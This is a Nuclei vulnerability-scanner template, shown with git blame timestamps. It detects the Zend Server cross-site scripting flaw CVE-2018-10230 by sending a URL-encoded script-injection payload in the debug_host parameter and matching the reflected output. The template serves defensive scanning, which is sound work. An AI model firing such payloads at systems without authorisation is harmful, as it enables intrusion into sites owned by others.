nuclei-templates/http/cves/2018/CVE-2018-10230.yaml

51 lines
1.4 KiB
YAML
Raw Normal View History

2022-06-08 13:18:46 +00:00
id: CVE-2018-10230
info:
name: Zend Server <9.13 - Cross-Site Scripting
2022-06-08 13:18:46 +00:00
author: marcos_iaf
severity: medium
2022-06-08 13:53:35 +00:00
description: |
Zend Server before version 9.13 is vulnerable to cross-site scripting via the debug_host parameter.
2023-09-06 12:57:14 +00:00
remediation: |
Upgrade Zend Server to version 9.13 or later to mitigate this vulnerability.
2022-06-08 13:53:35 +00:00
reference:
- https://www.synacktiv.com/ressources/zend_server_9_1_3_xss.pdf
- https://www.zend.com/en/products/server/release-notes
- https://nvd.nist.gov/vuln/detail/CVE-2018-10230
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-10230
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00122
epss-percentile: 0.46135
2023-09-06 12:57:14 +00:00
cpe: cpe:2.3:a:zend:zend_server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: zend
product: zend_server
tags: cve,cve2018,xss,zend
2022-06-08 13:18:46 +00:00
http:
2022-06-08 13:18:46 +00:00
- method: GET
path:
2022-06-08 13:53:35 +00:00
- "{{BaseURL}}/index.php?debug_host=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_debug=1"
2022-06-08 13:18:46 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2022-06-08 13:53:35 +00:00
words:
- "</script><script>alert(document.domain)</script>"
2022-06-09 11:22:15 +00:00
- "is not allowed to open debug sessions"
condition: and
2022-06-08 13:53:35 +00:00
- type: word
part: header
words:
- text/html
2022-06-08 13:18:46 +00:00
- type: status
status:
- 200